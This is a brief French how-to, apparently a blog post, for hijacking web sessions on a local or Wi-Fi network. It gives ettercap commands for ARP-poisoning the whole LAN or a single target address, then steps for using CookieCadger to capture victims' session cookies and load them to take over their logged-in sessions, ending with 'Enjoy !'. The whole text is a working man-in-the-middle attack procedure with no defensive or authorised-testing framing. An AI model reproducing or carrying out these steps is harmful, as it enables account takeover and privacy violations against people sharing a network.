Cookie Cadger
Avec Backtrack 5 R3
Pour récupérer des cookies lorsque qu'un utilisateur est connecté sur une page,
j'utilise CookieCadger disponible à cette adresse https://www.cookiecadger.com
Utilisation de CookieCadger
On va utiliser "Ettercap" pour capturer les paquets du réseau LAN.
Dans un terminal tapez :
ettercap -T -M arp // //
(capture tout le réseau)
Optionnel:
ettercap -Tq -M arp:remote -i eth0 /192.168.1.1/ /192.168.1.35/
(capture uniquement l'adresse 192.168.1.35)
-- Pour capturer en wifi rajouter l'inferface avec -i wlan0 --
ettercap -T -M arp // // -i wlan0
-- Pour capturer en wifi rajouter l'inferface avec -i wlan0 --
ettercap -T -M arp // // -i wlan0
Lancez dans un autre terminal :
java -jar CookieCadger-1.06.jar
Sélectionnez votre interface
Start Capture on "eth0"
Dans Filter Domains les cookies des sites récupérés
Cliquez sur un site et faites Load Domain Cookies
Vous avez récupérez la session du site :-)
Enjoy !
